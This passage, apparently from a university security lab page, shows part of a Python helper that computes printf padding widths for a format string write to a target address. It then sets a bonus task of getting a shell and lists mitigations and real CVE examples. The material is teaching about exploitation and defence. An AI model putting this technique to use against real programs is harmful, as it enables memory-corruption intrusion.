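        # Smallest width that makes the low byte of the running count equal `wanted`.
        width = (wanted - count - separator) % 256
        if width < minimum:     # keep room for the up to 8 hex digits %x may print
            width += 256
        widths.append(width)
        count += width + separator
    return widths


print(widths_for(0x08048494, 4 * 4 + 498))
```

The last width is 259 rather than 3 because a width of 3 could be exceeded by the printed value itself, which would make the running count unpredictable.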

[1p] Bonus task Can you get a shell? (Assume ASLR is disabled).

Mitigation and Recommendations

Manage the string length carefully
Don't use gets. With gets there is no way of knowing how much data was read
Use string functions that take a size parameter whenever a non-constant string is involved, e.g. snprintf, strncat.
Make sure that the NUL byte is added; for instance, strncpy does not add a NUL byte when the source string fills the whole destination size.
Use the wcs* functions when dealing with wide char strings.
Don't trust the user!

Real life Examples

Heartbleed
Linux kernel through 3.9.4 CVE-2013-2851. The fix is here. More details here.
Windows 7 CVE-2012-1851.
Pidgin off the record plugin CVE-2012-2369. The fix is here


cns/labs/lab-07.1573405830.txt.gz · Last modified: 2019/11/10 19:10 by cristina.popescu
